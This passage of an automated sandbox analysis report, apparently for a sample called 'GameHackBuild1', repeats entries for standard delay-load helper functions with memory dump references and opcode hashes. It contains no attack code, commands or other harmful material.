                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7ed34d89b6ecb8027167b1ecd86e0e268c67e1b1a9ab2ce1ad0db25aa812a3dd
                                      • Instruction ID: 0d1337e6ba328a4e200ead5f6a9b7fe0b706e81af9e83a4c2ed87c7773a0a651
                                      • Opcode Fuzzy Hash: 7ed34d89b6ecb8027167b1ecd86e0e268c67e1b1a9ab2ce1ad0db25aa812a3dd
                                      • Instruction Fuzzy Hash: E2B012A637C1067C320811082E07DF7023CD0C0B50331492AB106D0040D9404CC94031
                                      Function 00A1DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7d07136daeba672f13bf0bbec46fbcc98d2f7a4c9e43004dd096d63dbac270b8
                                      • Instruction ID: fad1ab97e991b683d93786d6234acb042c8639dabb6e923c5c6add3563973101
                                      • Opcode Fuzzy Hash: 7d07136daeba672f13bf0bbec46fbcc98d2f7a4c9e43004dd096d63dbac270b8
                                      • Instruction Fuzzy Hash: 67B012A63BC0017C3108511C2E07FF6023DE0C0B10331482AB10BC0040D9404C894131
                                      Function 00A1DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 790b064adcf919b0715edb14605a495f16403f7dd2ebe6dd19a24ff27a465c69
                                      • Instruction ID: edd332eaea8e5c9883e9735663d5cc03f69cd3ebd1ccc627b7811beab8fe6338
                                      • Opcode Fuzzy Hash: 790b064adcf919b0715edb14605a495f16403f7dd2ebe6dd19a24ff27a465c69
                                      • Instruction Fuzzy Hash: 18B012A12BC1017C7108B1056E12F7B026DE4C0B50330492BB009C4044D4404C854631
                                      Function 00A1DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e7c21bf64cc90b0b8244626c2dd17d8e89993b7cc13099bbc1ef8b67731db4ae
                                      • Instruction ID: c2570ee941d0f6387bdda66961d75ad84755b5702ba4b05b712a9b0e4181297f
                                      • Opcode Fuzzy Hash: e7c21bf64cc90b0b8244626c2dd17d8e89993b7cc13099bbc1ef8b67731db4ae
                                      • Instruction Fuzzy Hash: CCB012B627C2017D714C21146F02EB6023DC1C1B103304F1AB205E004095805CC55431
                                      Function 00A1DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b2ce8a202078e254b0e4131d1ce2ae8a0b46fd1e26a5d8b14678746055e9e69e
                                      • Instruction ID: a6a7b4daaf8700e7862ea6bba01b47791c757f9cdc27d72aa92a176d0f955622
                                      • Opcode Fuzzy Hash: b2ce8a202078e254b0e4131d1ce2ae8a0b46fd1e26a5d8b14678746055e9e69e
                                      • Instruction Fuzzy Hash: 0DB012B627C1017C714C61186E02FB6023CC0C6B103308E1AB609D0080D5805C854531
                                      Function 00A1DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 15fb63477872804a03d740686ca43b7fb0d593d832854b330e03d9ddda70e7f3
                                      • Instruction ID: 6f3118522208ead7561953dedd5b672129f1d28cd580ceaa1b892848ee835574
                                      • Opcode Fuzzy Hash: 15fb63477872804a03d740686ca43b7fb0d593d832854b330e03d9ddda70e7f3
                                      • Instruction Fuzzy Hash: C6B012B627C2017C714C61186E02FB6023CD0C1B103304E1BB209D0040D5805C854531
                                      Function 00A1D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 3f9a3c633e105ea2b13f4bf95974819bc579c793027e04aabee53e3d8b0e26e1
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 3f9a3c633e105ea2b13f4bf95974819bc579c793027e04aabee53e3d8b0e26e1
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b2ae2355afd2b2fce17ede3f58cae2b1bf4040455bf9c51bb71c9139322a54b2
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: b2ae2355afd2b2fce17ede3f58cae2b1bf4040455bf9c51bb71c9139322a54b2
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 91e89f141033e5652a8acddb27ebc24d17e5a1c8f9a5323488b18ff26e4f0882
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 91e89f141033e5652a8acddb27ebc24d17e5a1c8f9a5323488b18ff26e4f0882
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e60613db6c6d6fdc4158fdb3b8265a77957b1e89671568d8d2a5b5addc0e7cde
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: e60613db6c6d6fdc4158fdb3b8265a77957b1e89671568d8d2a5b5addc0e7cde
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c7e14d571e3ff4cd598ad5b71d014c0fd4a29e742cedfb41a11e03bbec97c71a
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: c7e14d571e3ff4cd598ad5b71d014c0fd4a29e742cedfb41a11e03bbec97c71a
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 2cf8a4c6f5ed938cc87f965f8e69e906362affc26e7fad1f5390c94324fb9b92
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 2cf8a4c6f5ed938cc87f965f8e69e906362affc26e7fad1f5390c94324fb9b92
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: ef32fc89b1e7c52bb249d65b4baf25757c053452e9369a65732dfc58d3198423
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: ef32fc89b1e7c52bb249d65b4baf25757c053452e9369a65732dfc58d3198423
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6a18f4ebb28102f1e5f42248e146a5f4c6f453105fd69cdad288e06830b0691e
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 6a18f4ebb28102f1e5f42248e146a5f4c6f453105fd69cdad288e06830b0691e
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a41b6670e28c6f98f2768bf18830961f65673ad6d5532bad9cf94a0e7abb8105
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: a41b6670e28c6f98f2768bf18830961f65673ad6d5532bad9cf94a0e7abb8105
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
